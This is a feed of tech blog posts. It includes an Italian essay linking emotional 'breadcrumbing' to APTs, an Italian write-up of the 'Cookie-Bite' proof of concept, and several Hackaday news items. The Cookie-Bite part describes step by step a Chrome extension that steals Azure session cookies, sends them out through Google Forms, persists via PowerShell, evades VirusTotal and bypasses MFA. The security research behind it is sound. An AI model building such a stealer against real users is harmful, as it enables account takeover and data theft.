Immaginatelo come la tecnica di un pescatore esperto: non getta una rete enorme, ma lancia piccole, allettanti esche – briciole di pane – per tenere i pesci nel suo raggio d’azione, incuriositi e speranzosi, senza mai dargli una preda vera e propria. Questa tecnica, che in ambito relazionale consiste nel lasciare “briciole” di attenzione per tenere una vittima legata senza un impegno reale, trova una risonanza spaventosa nel modus operandi delle minacce persistenti avanzate. Descrive una realtà relazionale che ha effetti palpabili sul benessere psicologico individuale. È, in essenza, la manipolazione della speranza.

Un inganno emotivo

Per capire il breadcrumbing, dobbiamo addentrarci nei meandri della nostra psiche. Noi esseri umani siamo cablati per la connessione e per la ricerca di significato. Quando entriamo in relazione con qualcuno, sviluppiamo naturalmente aspettative, desideri e una proiezione verso un futuro condiviso. Questo processo è alimentato dalla speranza, un meccanismo psicologico fondamentale che ci spinge a persistere di fronte alle difficoltà, a investire energie e ad anticipare ricompense.

Nel contesto del breadcrumbing, questa sana speranza viene distorta. La persona che “lancia le briciole” non offre una ricompensa concreta, ma solo la promessa di una potenziale ricompensa futura. Questo attiva un potente meccanismo psicologico noto come rinforzo intermittente, ampiamente studiato in psicologia comportamentale. Immaginate un giocatore d’azzardo: la vincita occasionale e imprevedibile lo tiene attaccato al gioco molto più di una vincita garantita o di una perdita costante. Allo stesso modo, un messaggio casuale dopo giorni di silenzio, o un complimento inaspettato, agisce come una “vincita” emotiva, riaccendendo la speranza e giustificando l’attesa. Questo ciclo crea una vera e propria dipendenza emotiva. La vittima inizia a monitorare ogni segnale, ogni “briciola”, interpretandola come prova che “forse questa volta cambierà”, o “forse è solo impegnato/a”. Si entra in uno stato di ipervigilanza relazionale, un’ansia sottile ma costante, dove l’attenzione è tutta proiettata sull’altro, nella vana attesa di una conferma che non arriva mai pienamente.

Perché succede

Possiamo intravedere diverse dinamiche sottostanti:

• Paura dell’intimità e dell’impegno: per alcuni, l’intimità profonda è terrificante. Il breadcrumbing permette di mantenere una connessione a distanza di sicurezza, evitando la vulnerabilità che deriva da un impegno reale. Ciò può essere legato a stili di attaccamento insicuri (evitante, disorganizzato) sviluppati nell’infanzia, dove l’intimità era associata al dolore o alla perdita.
• Bisogno di attenzione e controllo: dispensare briciole permette di sentirsi desiderati e di avere “opzioni aperte”, alimentando l’ego senza dover dare nulla in cambio. È una forma di controllo sulla disponibilità emotiva dell’altro, un modo per sentirsi potenti.
• Narcisismo e mancanza di empatia: in casi più estremi, il breadcrumbing può essere una manifestazione di tratti narcisistici, dove l’altro è visto come un’estensione per soddisfare i propri bisogni, senza una vera considerazione per i suoi sentimenti.
• Difficoltà a comunicare e stabilire limiti: a volte, è semplicemente la difficoltà a dire “no”, a essere onesti sulle proprie intenzioni, o a gestire il disagio di una chiusura definitiva.

Dal punto di vista della vittima, le vulnerabilità sono altrettanto profonde: una bassa autostima può renderci più propensi ad accontentarci delle briciole; la paura della solitudine può farci aggrappare a qualsiasi barlume di connessione; e schemi relazionali passati (magari con genitori emotivamente non disponibili) possono renderci “programmati” a cercare amore in situazioni che offrono solo frammenti.

Il Breadcrumbing una similitudine con il Digitale

Questo stesso schema di manipolazione della speranza e di rinforzo intermittente si riflette in modo sorprendente nel mondo della cybersecurity. Non è solo una metafora; è una comprensione profonda delle vulnerabilità psicologiche che vengono sfruttate.

Pensate alle minacce persistenti avanzate. Raramente si tratta di un’unica, clamorosa irruzione. Piuttosto, gli attaccanti adottano una strategia di breadcrumbing digitale. Non un’email palesemente truffaldina, ma una ben costruita, con un link o un allegato che sembra quasi legittimo. Questa è la prima “briciola”, progettata per ottenere un piccolo accesso, per seminare un malware latente. I cybercriminali non cercano il “botto”, ma la persistenza. Dopo un primo accesso, l’attaccante non agisce subito. Si muove “lateralmente” nella rete, raccogliendo informazioni con attività a basso impatto, quasi invisibili. Ogni file esaminato, ogni credenziale catturata è una “briciola” di conoscenza, accumulata senza destare sospetti, proprio come il breadcrumber raccoglie informazioni su di te senza un vero impegno. Gli attacchi possono rimanere dormienti per mesi o anni, esfiltrando dati lentamente, seminando malware che si attiva solo in condizioni specifiche. Non c’è una “rottura” o un attacco diretto, ma una disponibilità latente, un po’ come la relazione di breadcrumbing che non finisce mai del tutto, ma non evolve nemmeno.

Le vulnerabilità psicologiche

Il legame tra il breadcrumbing emotivo e quello cibernetico risiede nelle nostre vulnerabilità più profonde:

• La paura di perdere: sia in una relazione che nella sicurezza, tendiamo a sottovalutare i segnali deboli per paura di perdere qualcosa (la relazione, l’accesso, i dati).
• La tendenza a normalizzare: “È solo un ritardo”, “È solo un picco di traffico”. Siamo inclini a normalizzare comportamenti anomali, sia da parte di una persona che da parte di un sistema.
• La difficoltà di riconoscere l’assenza: il breadcrumbing è l’assenza di impegno mascherata da presenza. Nell’IT, l’assenza di un attacco clamoroso può mascherare una violazione continua e silenziosa.

Impatti Psicologici

Vivere in un ciclo di breadcrumbing lascia profonde cicatrici:

• Ansia e stress continui: la costante incertezza genera uno stato di allerta permanente, che può manifestarsi fisicamente e mentalmente.
• Deterioramento dell’autostima: la vittima inizia a chiedersi “Cosa c’è di sbagliato in me?”, “Perché non sono abbastanza?”. La percezione di non meritare un amore pieno e autentico si rafforza.
• Difficoltà a fidarsi: una volta usciti da questa dinamica, la capacità di fidarsi di nuove persone può essere compromessa, rendendo difficile formare relazioni sane.
• Spreco di tempo ed energie: l’investimento prolungato in una relazione senza futuro prosciuga risorse che potrebbero essere impiegate in modo più costruttivo.
• Isolamento: la persona può ritirarsi, concentrando tutta l’energia su questa relazione disfunzionale e trascurando amicizie o altri interessi.

La consapevolezza è la chiave

Se la psicologia del breadcrumbing ci insegna qualcosa, è che la consapevolezza è la nostra arma più potente.

A livello Personale

• Educazione emotiva: comprendere le dinamiche relazionali disfunzionali e i propri schemi di attaccamento.
• Costruzione dell’autostima: una forte autostima è il miglior antidoto contro la necessità di “briciole”.
• Confini solidi: imparare a dire “no”, a chiedere ciò che si merita e a ritirarsi quando i propri bisogni non sono soddisfatti.

A livello di Cybersecurity

• Human Firewall: la formazione e la consapevolezza degli utenti sono cruciali. Insegnare a riconoscere il phishing, le tecniche di social engineering e i tentativi di manipolazione è come addestrare la mente a riconoscere i segnali del breadcrumbing emotivo.
• Monitoraggio comportamentale: non basta rilevare malware noti. Bisogna monitorare le “briciole” di attività anomale, i pattern comportamentali insoliti dei sistemi e degli utenti. Soluzioni di monitoraggio avanzato diventano i nostri “terapeuti” digitali, aiutandoci a identificare schemi disfunzionali prima che diventino crisi.
• Approccio Zero Trust: non fidarsi implicitamente di nulla, nemmeno all’interno della rete. Ogni “briciola” di accesso deve essere verificata e limitata al minimo indispensabile.
• Resilienza e Disaster Recovery: accettare che la compromissione è possibile e quindi occorre avere piani robusti per minimizzare i danni e ripristinare i sistemi. Non vivere nella vana speranza che l’attacco non arriverà mai.

Conclusione

Il cuore umano, nella sua complessità, è un ecosistema di speranze e paure, di connessioni e vulnerabilità. E, sorprendentemente, in questo studio sulle “briciole” dell’anima, abbiamo scoperto che le nostre reti digitali non sono poi così diverse.

Abbiamo esplorato come la psicologia della manipolazione emotiva si traduce in tattiche di cybersecurity, rivelando che il breadcrumbing è molto più di un fenomeno relazionale: è una lezione fondamentale sulla resilienza digitale.

La nostra capacità di difenderci non dipende solo dagli strumenti che impieghiamo, ma dalla prontezza con cui riconosciamo i segnali deboli, quelle anomalie minute, quei sussurri digitali che, accumulati, dipingono il quadro di un’invasione imminente.

È tempo di superare la superficialità e adottare una mentalità di ipersensibilità ai segnali: solo così potremo distinguere le false promesse digitali dalle vere intenzioni, trasformando le nostre vulnerabilità psicologiche in robustezza cibernetica. La guerra cyber non si vince con attacchi clamorosi, ma decifrando ogni singolo, microscopico frammento. Non lasciatevi ingannare dalle briciole; sono solo l’inizio.

E allora vi chiedo, con l’umiltà di chi osserva le fragilità umane e digitali:Siamo davvero i custodi attenti del nostro confine, sia esso emotivo o informatico?

Abbiamo il coraggio di esigere chiarezza e impegno, rifiutandole “briciole” che minacciano la vostra integrità?

E, in un mondo sempre più interconnesso, quanto siamo pronti a riconoscere che la vera forza risiede non solo nel codice più robusto, ma nella consapevolezza più profonda?

L'articolo Breadcrumbing: capire la manipolazione emotiva per difendersi meglio nel dominio digitale proviene da il blog della sicurezza informatica.

Sebbene siano molto diffuse, le estensioni dei browser Web non sono necessariamente sicure. Proprio come qualsiasi altro software che si possa installare sul computer, le estensioni possono contenere codice dannoso progettato per arrecare ingenti danni ai pc dei malcapitati. L’ultima dimostrazione dei potenziali danni delle estensioni arriva sotto forma di un attacco malware proof-of-concept (PoC). I ricercatori di sicurezza hanno sviluppato “Cookie-Bite”, che mostra come le estensioni di Chrome possano dirottare furtivamente i token di sessione.

I threat actor spesso utilizzano gli infostealer per estrarre i token di autenticazione direttamente dal computer della vittima o acquistarli direttamente attraverso i Dark Market, consentendo agli avversari di dirottare le sessioni cloud attive senza attivare l’MFA. Iniettando questi cookie e imitando il sistema operativo, il browser e la rete della vittima, gli aggressori possono eludere le politiche di accesso condizionato (CAP) e mantenere un accesso persistente.

In parole povere, ciò significa che i malintenzionati possono accedere a quasi tutti i siti come impersonando la vittima. Tutto ciò che devono fare è ingannare gli utenti e spingerli ad installare un’estensione del browser apparentemente innocua. Oppure, se hanno ottenuto l’accesso al computer, possono installare l’estensione dannosa senza che gli utenti se ne accorgano. In questo documento verrà rappresentata una PoC di come funziona l’attacco.

Come vengo estratti i cookie dagli infostealer

Il malware Infostealer è emerso come un avversario formidabile, abile nel rubare dati sensibili, compresi i cookie di autenticazione. Questi programmi dannosi si infiltrano nei sistemi per esfiltrare le credenziali di accesso, i cookie di sessione e i token di autenticazione che vengono poi inviati a server remoti controllati dai criminali informatici.

Con i cookie rubati, gli aggressori possono dirottare le sessioni attive degli utenti, impersonare utenti legittimi e aggirare completamente l’MFA. Rubano, rubano la nostra identità. La maggior parte dei pirati informatici non utilizza direttamente i dati rubati. Operano invece nell’ambito di un modello di Malware-as-a-Service (MaaS), in cui diversi attori svolgono ruoli specializzati. Questi ruoli possono includere

Operatori di infostealer che sviluppano e distribuiscono malware per infettare il maggior numero possibile di vittime. Tracer (affiliati) che diffondono il malware attraverso tattiche di phishing, annunci malevoli o crack di software. Mercati darknet che fungono da hub in cui i criminali informatici vendono in massa cookie, credenziali e impronte digitali del browser rubati Gli acquirenti (da broker di accesso iniziale e gruppi di ransomware) acquistano queste credenziali per ottenere un accesso non autorizzato a servizi cloud, VPN aziendali e piattaforme sensibili.

Una volta venduti, i cookie di autenticazione rubati consentono agli aggressori di accedere come la vittima, spesso aggirando l’MFA. Questa tecnica, nota come session hijacking, è ampiamente sfruttata per violazioni aziendali, frodi finanziarie e spionaggio.

Le modalità di furto dei cookie

Nel panorama in evoluzione del dirottamento di sessione, gli aggressori utilizzano diverse tecniche per rubare i cookie di autenticazione, consentendo loro di bypassare l’MFA e di impersonare utenti legittimi.

I principali metodi utilizzati per rubare i cookie di autenticazione

Adversary-in-the-Middle

Gli attacchi di phishing AITM vanno oltre il tradizionale furto di credenziali intercettando i token di autenticazione e i cookie di sessione in tempo reale. Gli aggressori utilizzano strumenti di reverse proxy (ad esempio, Evilginx, Modlishka, Muraena) per interporsi tra la vittima e il servizio di autenticazione legittimo (ad esempio, Microsoft 365, Google).

Quando la vittima effettua l’accesso, il proxy cattura le credenziali, i token MFA e i cookie di sessione, consentendo all’aggressore di bypassare l’MFA e dirottare la sessione senza richiedere nuovamente la password dell’utente. Questa tecnica è ampiamente utilizzata per compromettere gli account cloud e aggirare le moderne difese di autenticazione.

Figura 1 AITM Flow

Dumping della memoria del processo del browser

Gli infiltrati sfruttano il fatto che i browser decifrano i cookie durante le sessioni attive, memorizzandoli per un accesso rapido. Il malware può iniettare codice nei processi del browser in esecuzione (ad esempio, chrome.exe, msedge.exe) per leggere questo spazio di memoria ed estrarre i cookie in chiaro. Questo approccio aggira la necessità di decriptare i cookie dal disco, poiché vi accede dopo la decriptazione durante l’uso attivo.

Estensioni del browser dannose

Le estensioni dannose del browser consentono agli aggressori di accedere direttamente ai cookie di autenticazione e ai token di sessione operando nel contesto di sicurezza del browser. Queste estensioni, spesso camuffate da strumenti legittimi, richiedono autorizzazioni eccessive che consentono loro di interagire con le sessioni Web, modificare il contenuto delle pagine ed estrarre i dati di autenticazione memorizzati. Una volta installate, possono accedere all’API di archiviazione del browser, intercettare le richieste di rete o iniettare JavaScript dannoso nelle sessioni attive per rubare i cookie di sessione in tempo reale.

A differenza del malware tradizionale, non è necessaria l’iniezione di processi o la decrittazione del disco, rendendo questa tecnica più difficile da rilevare a livello di endpoint. I token di autenticazione rubati vengono esfiltrati sul server dell’aggressore, dove possono essere riprodotti per aggirare l’MFA e impersonare la vittima.

Di solito, i browser memorizzano le estensioni nel seguente percorso (Chrome):

Windows: C:\Users\AppData\Local\Google\Chrome\Dati_Utente\Default\Extensions

Linux:

~/.config/google-chrome/Default/Extensions/

MacOS:

~/Libreria/Supporto Applicazioni/Google/Chrome/Default/Estensioni

Le estensioni personalizzate del browser che non sono firmate possono essere caricate in modalità sviluppatore e poi caricate.

Figura 2 Estensione cookie-stealer caricata in Chrome

Decifrare i cookie memorizzati localmente

I browser memorizzano i cookie di autenticazione in database SQLite crittografati per mantenere la persistenza della sessione e proteggere i dati sensibili dell’utente. Tuttavia, gli aggressori possono estrarre e decifrare questi cookie ottenendo sia il database dei cookie memorizzati sia la chiave di crittografia utilizzata per proteggerli.

Il metodo varia a seconda del sistema operativo e del modello di sicurezza del browser: Windows si affida alla crittografia DPAPI, mentre Linux e macOS utilizzano meccanismi di keychain specifici del sistema.

Ad esempio:

I cookie di sessione memorizzati su Mac possono trovarsi in “/Library/Application Support/Google/Chrome/Default/Cookies”, limitati da Transparency, Consent and Control (TCC).

Su Windows, i browser basati su Chromium (Chrome, Edge, Brave, ecc.) memorizzano i cookie di autenticazione in Dati utente/…/Rete/Cookies il database SQLite principale contiene cookie crittografati AESStato locale → Memorizza la chiave di crittografia AES, che è a sua volta crittografata utilizzando WindowsData Protection API (DPAPI)

Poiché DPAPI vincola la crittografia al profilo utente e al computer, gli aggressori non possono decifrare facilmente i cookie al di fuori del sistema della vittima. Per aggirare questo problema, gli infiltrati devono:

Decifrare la chiave AES localmente utilizzando DPAPI (CryptUnprotectData()) all’interno della sessione infetta.

Rubare la chiave master DPAPI (C:\Users\…\AppData\Roaming\Microsoft\Protect) per tentare la decrittazione offline. La chiave master è crittografata con la password dell’utente (utente locale).

la password dell’utente (utente locale o utente AD) oppure

il segreto DPAPI_SYSTEM, nel caso di un sistema integrato.

Figura 3 Decriptare il blob usando DPAPI

Quali sono i cookie più preziosi?

Quando compromettono un dispositivo, gli aggressori danno priorità ai cookie in base al loro potenziale di ulteriore sfruttamento. Il valore dei cookie rubati dipende sia dalle motivazioni degli aggressori sia dalla domanda del mercato. Nella maggior parte dei casi, i cookie più preziosi sono quelli che forniscono un accesso a lungo termine ad account di alto valore o che consentono profonde opportunità di post-sfruttamento.

I cookie di sessione legati agli account dei social media (ad esempio, Facebook, Instagram, Twitter) possono essere redditizi, soprattutto se l’account ha un grande seguito, un’influenza commerciale o l’accesso a conti per la spesa pubblicitaria. Tuttavia, la loro utilità dipende dallo stato dell’account e dal valore di rivendita.

D’altro canto, i cookie delle sessioni cloud aziendali attive, come Microsoft 365, Google Workspace o AWS, sono spesso più interessanti per uno sfruttamento mirato successivo. Una sessione aziendale dirottata può consentire agli aggressori di accedere alle e-mail interne, esfiltrare dati sensibili, aumentare i privilegi o persino spostarsi lateralmente attraverso un’intera rete aziendale, portando potenzialmente a una completa compromissione dell’azienda.

Dirottare l’autenticazione di Azure

Questa ricerca si concentra su ESTSAUTH e ESTSAUTHPERSISTENT, due cookie di autenticazione critici utilizzati da Azure Entra ID (precedentemente AAD). Questi cookie mantengono le sessioni cloud autenticate e consentono l’accesso a Microsoft 365, Azure Portal e altre applicazioni aziendali.

Dirottando questi token di sessione, gli aggressori possono aggirare l’MFA, impersonare gli utenti e spostarsi lateralmente tra gli ambienti cloud, rendendoli uno degli obiettivi più preziosi per i ladri di informazioni e gli attori delle minacce.

Figura 4 Altri fornitori cloud Cookie di autenticazione

Nota: l’articolo si concentra principalmente sui cookie relativi all’autenticazione di Azure, ma le tecniche e gli approcci condivisi possono essere applicati anche ad altre piattaforme e servizi cloud elencati nella tabella precedente. I risultati pratici possono variare a seconda dell’ambiente di destinazione e delle sue difese, poiché ogni servizio ha una propria architettura di cookie, gestione delle sessioni e sicurezza.

Ruolo dei token ESTSAUTH e ESTSAUTHPERSISTENT

Nell’autenticazione web di Azure Entra ID, ESTSAUTH e ESTSAUTHPERSISTENT sono importanti token di sessione memorizzati come cookie del browser che rappresentano la sessione autenticata dell’utente:

ESTSAUTH: è il cookie di sessione principale di Azure Entra ID. “Contiene le informazioni sulla sessione dell’utente per facilitare l’SSO”. Si tratta di un token di sessione transitorio, cioè valido per la durata della sessione del browser. Se l’utente chiude il browser e non ha scelto un login persistente, il cookie ESTSAUTH viene distrutto, richiedendo un nuovo login la volta successiva. Per impostazione predefinita, un cookie ESTSAUTH (sessione non persistente) ha una validità massima di 24 ore, trascorse le quali l’utente dovrà effettuare una nuova autenticazione.

ESTSAUTHPERSISTENT: si tratta di una versione persistente del cookie di sessione Azure Entra ID. Contiene anche informazioni di sessione per l’SSO, ma è memorizzato come cookie persistente che rimane anche dopo la chiusura del browser. Questo cookie viene impostato quando un utente sceglie di “rimanere connesso” o quando viene applicata la funzione “Keep Me Signed In” (KMSI) di Azure Entra ID. Un token di sessione persistente consente all’utente di rimanere connesso anche dopo il riavvio del browser per un periodo prolungato. Per impostazione predefinita, il cookie ESTSAUTHPERSISTENT può rimanere valido per 90 giorni (il periodo di accesso predefinito di Azure Entra ID) o per la durata specificata dal criterio. Ciò significa che se un’utente scegliesse di rimanere connesso, potrebbe non essere richiesto di nuovo di fornire le credenziali o l’MFA per un massimo di 90 giorni su quel dispositivo. Il progetto di Azure Entra ID prevede che non venga richiesta una nuova autenticazione a meno che la sicurezza della sessione non cambi (ad esempio, modifica della password, disconnessione esplicita, modifica dei criteri).

Figura 5 Stay-signed-in

Questi cookie svolgono un ruolo fondamentale nell’equilibrio tra sicurezza e usabilità di Azure Entra ID. Essi contengono una forma di credenziale di sessione che dimostra che l’utente si è recentemente autenticato e, se applicabile, ha soddisfatto i requisiti MFA. Ad esempio, dopo un’autenticazione riuscita, Azure Entra ID può impostare un cookie ESTSAUTHPERSISTENT se l’utente ha fatto clic su “Sì” per rimanere connesso. Nei successivi accessi, la presenza di questo cookie consente ad Azure Entra ID di autenticare istantaneamente l’utente senza un’altra richiesta MFA. In altre parole, il cookie serve a dimostrare che “l’utente ha già eseguito l’MFA su questo browser, quindi non richiede un’altra richiesta” e garantisce l’accesso immediato.

In sintesi, i token ESTSAUTH(PERSISTENT) sono essenzialmente le “chiavi del regno” per quella sessione utente: provano che l’MFA è stato aggirato e consentono l’accesso continuo. Se un utente malintenzionato riesce a ottenere questi token, può impersonare la sessione dell’utente e bypassare l’intero processo di login (compreso l’MFA) perché Azure Entra ID considererà la sua sessione come già autenticata. Le sezioni seguenti analizzano come gli aggressori riescono a ottenere questo risultato e come difendersi da esso.

Figura 6 Cookie salvati in sessione

Questi cookie sono memorizzati localmente nel database SQLite di Chrome, situato all’indirizzo:

%LOCALAPPDATA%\Google\Chrome\Dati dell’utente\Default\Network\Cookies 

Chrome cripta i valori dei cookie utilizzando DPAPI, che lega la crittografia al profilo Windows dell’utente corrente.

Figura 7 Cookie ESTS salvati localmente e valore dei dati binari ESTSAUTH (blob)

Creazione di un cookie stealer personalizzato: In questa proof-of-concept, è stato creato un cookie stealer persistente che estrae i cookie di autenticazione da una sessione attiva del browser e li esfiltra ogni volta che la vittima accede al portale di autenticazione Microsoft. Questo attacco aggira l’MFA sfruttando i cookie di sessione, consentendo l’accesso continuo ai servizi cloud senza richiedere le credenziali dell’utente. Invece di un furto di cookie una tantum, questo metodo garantisce che i cookie di sessione validi vengano estratti ogni volta che l’utente accede, mantenendo l’accesso non autorizzato a lungo termine. Al termine di questa PoC, si avrà:

• Un’estensione Chrome personalizzata che monitora gli eventi di autenticazione e cattura i cookie
• Uno script di PowerShell che automatizza l’implementazione dell’estensione e ne garantisce la persistenza
• Un semplice meccanismo di esfiltrazione per inviare i cookie a un punto di raccolta esterno Un’estensione complementare per iniettare in modo fluido i cookie catturati nel browser dell’attaccante, facilitando un dirottamento di sessione immediato e furtivo

Flow

Il diagramma seguente illustra il flusso end-to-end della Proof of Concept, dimostrando come gli aggressori catturino, esfiltrano e riutilizzino silenziosamente i cookie di autenticazione per dirottare le sessioni cloud delle vittime:

Figura 8 Diagramma della PoC

Fase 1:

Creazione dell’estensione Chrome per l’estrazione dei cookie Innanzitutto, si crea un’estensione Chrome che ascolta gli eventi di autenticazione e ruba i cookie di sessione quando la vittima accede a login.microsoftonline.com.

1. Configurazione della directory dell’estensione

Creazione una nuova directory chiamata CookieStealer Extension. All’interno di questa directory, si creino due file:

• manifest.json (Definisce permessi e comportamenti)
• background.js (Gestisce l’estrazione e l’esfiltrazione dei cookie)

1. Configurazione di manifest.json

Il file manifest definisce il comportamento dell’estensione, i permessi richiesti e gli script in background. Crea manifest.json all’interno della directory dell’estensione:

Figura 9 estensione manifest

Cosa fa:

Concede l’autorizzazione ad accedere a cookie, schede e richieste web. Limita l’esecuzione a login.microsoftonline.com. Carica background.js come servizio in background da eseguire in modo persistente.

1. Scrittura della logica di estrazione dei cookie (background.js)

L’estensione estrae i cookie ogni volta che la vittima accede al portale di autenticazione di Microsoft. Crea background.js e aggiungi quanto segue:

Figura 10 Estensione cookie durante l’accesso

L’estensione ascolta le richieste di autenticazione su login.microsoftonline.com. Quando si verifica un accesso, estrae i cookie (inclusi ESTSAUTH ed ESTSAUTHPERSISTENT). E’ stato scelto di esfiltrare i cookie in modo silenzioso tramite Moduli Google, direttamente sul Drive personale:

Figura 11Cookie Exfiltration attraverso google forms

Con l’estensione pronta, il passo successivo è automatizzarne la distribuzione. Dopo aver compresso l’estensione in un file CRX e averlo caricato su VirusTotal, il risultato mostra che nessun fornitore di sicurezza la rileva attualmente come dannosa.

Faese2: Automazione della distribuzione con PowerShell

Per automatizzare il caricamento dell’estensione, verrà creato uno script di PowerShell che la caricherà nel profilo utente predefinito di Chrome. Ecco una parte del codice che l’ha eseguita:

Questo script di PowerShell carica l’estensione in un processo di Chrome appena avviato. Tuttavia, l’estensione rimane attiva solo per la durata di questa sessione di Chrome. Una volta chiuso Chrome, l’estensione verrà rimossa automaticamente.

Pertanto, è consigliabile pianificare l’esecuzione periodica di questo script (ad esempio, ogni poche ore o quotidianamente, operazione eseguibile tramite un’attività pianificata o una cartella di avvio). Sebbene esistano metodi per caricare le estensioni in modo persistente, come l’utilizzo di policy basate sul registro o l’iniezione dell’estensione direttamente nel file Secure Preferences di Chrome bypassando il Message Authentication Code (MAC), questi approcci sono più complessi e in genere richiedono privilegi amministrativi.

Le aziende potrebbero limitare l’uso degli script di PowerShell. In questi casi, sarà necessario trovare alternative, come Python, VBScript o macro, per ottenere risultati simili.

Fase 3: Iniezione dei cookie

Dopo aver rubato i cookie di sessione, il passaggio successivo consiste nell’iniettarli nel browser dell’attaccante per ottenere l’accesso desiderato. Per raggiungere questo scopo, è stata utilizzata un’estensione di Chrome chiamata Cookie-Editor (ID: hlkenndednhfkekhgcdicdfddnkalmdm), disponibile sul Chrome Web Store.

Figura 12 Editor di cookie legittimo

Per prima cosa, si copino i dati dei cookie restituiti dal modulo Google, che sono già in formato JSON.

Figura 13 Cookie estratti da Google Forms C2

Successivamente verranno importati i dati dei cookie copiati nell’estensione Cookie-Editor.

Infine, si aggiorni la pagina per accedere al portale cloud della vittima di destinazione. E’ stato osservato, nel registro di accesso di Azure, che sono riuscite due autenticazioni con lo stesso ID sessione da posizioni e versioni del browser diverse in un breve lasso di tempo: Il vantaggio di questo approccio è che garantisce una sessione valida all’infrastruttura Azure dell’utente di destinazione. Questa rimane valida indipendentemente dal fatto che la durata della sessione sia scaduta o sia stata revocata, poiché l’estensione persiste e viene attivata ogni volta che viene avviato l’accesso Microsoft.

Conclusioni

Questo PoC dimostra come un aggressore possa creare un ladro di cookie persistente utilizzando solo un’estensione del browser e l’automazione di PowerShell. Sfruttando gli hook degli eventi di autenticazione, l’attacco garantisce che i cookie di sessione validi vengano estratti continuamente, garantendo un accesso non autorizzato a lungo termine.

Questa tecnica non richiede un’infezione da malware, ma un semplice script, rendendola più difficile da rilevare. La persistenza viene ottenuta tramite il browser stesso, evitando modifiche al sistema. Gli aggressori possono aggirare l’MFA rubando i cookie di sessione a ogni tentativo di accesso.

L'articolo “Cookie-Bite”: L’attacco Segreto che Usa le Estensioni per Dirottare le Tue Sessioni Online proviene da il blog della sicurezza informatica.

In questo quarto episodio ci occupiamo dell'organizzazione della giornata utilizzando l'intelligenza artificiale generativa.

zerodays.podbean.com/e/io-e-ch…

When seeing a story from MIT’s Lincoln Labs that promises 3D printing glass, our first reaction was that it might use some rare or novel chemicals, and certainly a super-high-tech printer. Perhaps it was some form of high-temperature laser sintering, unlikely to be within the reach of mere mortals. How wrong we were, because these boffins have developed a way to 3D print a glass-like material using easy-to-source materials and commonly available equipment.

The print medium is sodium silicate solution, commonly known as waterglass, mixed with silica and other inorganic nanoparticles. It’s referred to as an ink, and it appears to be printed using a technique very similar to the FDM printers we all know. The real magic comes in the curing process, though, because instead of being fired in a special furnace, these models are heated to 200 Celsius in an oil bath. They can then be solvent cleaned and are ready for use. The result may not be the fine crystal glass you may be expecting, but we can certainly see plenty of uses for it should it be turned into a commercial product. Certainly more convenient than sintering with a laser cutter.

hackaday.com/2025/06/22/3d-pri…

Hold onto your hats, everyone — there’s stunning news afoot. It’s hard to believe, but it looks like over-reliance on chatbots to do your homework can turn your brain into pudding. At least that seems to be the conclusion of a preprint paper out of the MIT Media Lab, which looked at 54 adults between the ages of 18 and 39, who were tasked with writing a series of essays. They divided participants into three groups — one that used ChatGPT to help write the essays, one that was limited to using only Google search, and one that had to do everything the old-fashioned way. They recorded the brain activity of writers using EEG, in order to get an idea of brain engagement with the task. The brain-only group had the greatest engagement, which stayed consistently high throughout the series, while the ChatGPT group had the least. More alarmingly, the engagement for the chatbot group went down even further with each essay written. The ChatGPT group produced essays that were very similar between writers and were judged “soulless” by two English teachers. Go figure.

The most interesting finding, though, was when 18 participants from the chatbot and brain-only groups were asked to rewrite one of their earlier essays, with the added twist that the chatbot group had to do it all by themselves, while the brainiacs got to use ChatGPT. The EEGs showed that the first group struggled with the task, presumably because they failed to form any deep memory of their previous work thanks to over-reliance on ChatGPT. The brain-only folks, however, did well at the task and showed signs of activity across all EEG bands. That fits well with our experience with chatbots, which we use to help retrieve specific facts and figures while writing articles, especially ones we know we’ve seen during our initial scan of the literature but can’t find later.

Does anyone remember Elektro? We sure do, although not from personal experience, since the seven-foot-tall automaton built by Westinghouse for the World’s Fair in New York City in 1939 significantly predates our appearance on the planet. But still, the golden-skinned robot that made its living by walking around, smoking, and cracking wise at the audience thanks to a 78-rpm record player in its capacious chest, really made an impression, enough that it toured the country for the better part of 30 years and made the unforgettable Sex Kittens Go to College in 1960 before fading into obscurity. At some point, the one-of-a-kind robot was rescued from a scrap heap and restored to its former glory, and now resides in the North Central Ohio Industrial Museum in Mansfield, very close to the Westinghouse facility that built it. If you need an excuse to visit North Central Ohio, you could do worse than a visit to see Elektro.

youtube.com/embed/AuyTRbj8QSA?…

It was with some alarm that we learned this week from Al Williams that mtrek.com 1701 appeared to be down. For those not in the know, mtrek is a Telnet space combat game inspired by the Star Trek franchise, which explains why Al was in such a tizzy about not being able to connect; huge Trek nerd, our Al. Anyway, it appears Al’s worst fears were unfounded, as we were able to connect to mtrek just fine. But in the process of doing so, we stumbled across this collection of Telnet games and demos that’s worth checking out. The mtrek, of course, as well as Telnet versions of chess and backgammon, and an interactive world map that always blows our mind. The site also lists the Telnet GOAT, the Star Wars Asciimation; sadly, that one does seem to be down, at least for us. Sure, you can see it in a web browser, but it’s not the same as watching it in a terminal over Telnet, is it?

And finally, if you’ve got 90 minutes or so to spare, you could do worse than to spend it with our friend Hash as he reverse engineers an automotive ECU. We have to admit that we haven’t indulged yet — it’s on our playlist for this weekend, because we know how to party. But from what Hash tells us, this is the tortured tale of a job that took far, far longer to complete than expected. We have to admit that while we’ll gladly undertake almost any mechanical repair on most vehicles, automotive ECUs and other electronic modules are almost a bridge too far for us, at least in terms of cracking them open to make even simple repairs. Getting access to them for firmware extraction and parameter fiddling sounds like a lot of fun, and we’re looking forward to hearing what Hash has to say about the subject.

youtube.com/embed/0tkdst3JE0g?…

hackaday.com/2025/06/22/hackad…

Look out of a window, ask yourself the question, “Has a nuke gone off?”. Maybe, maybe not, and all of us here at Hackaday need to know the answer to these important questions! Introducing the hasanukegoneoff.com Indicator from [bigcrimping] to answer our cries.

An ESP32 running a MicroPython script handles the critical checks from hasanukegoneoff.com for any notification of nuclear mayhem. This will either power the INS-1 neon bulb, indicating “no” or “yes” in the unfortunate case of a blast. Of course, there is also the button required for testing the notification lights; no chance of failure can be left. All of this is fitted onto a custom dual-sided PCB and placed inside a custom 3D-printed enclosure.

Hasanukegoneoff.com’s detection system, covered before here, relies on an HSN-1000L Nuclear Event Detector to check for neutrons coming from the blast zone. [bigcrimping] also provides the project plans for your own blast detector to answer the critical question of “has a nuke gone off” from anywhere other than the website’s Chippenham, England location.

This entire project is open sourced, so keep sure to check out [bigcrimping]’s GitHub for both portions of this project on the detector and receiver. While this project provides some needed dark humor, nukes are still scary and especially so when disarming them with nothing but a hacksaw and testing equipment.

Thanks to [Daniel Gooch] for the tip.

hackaday.com/2025/06/22/has-a-…

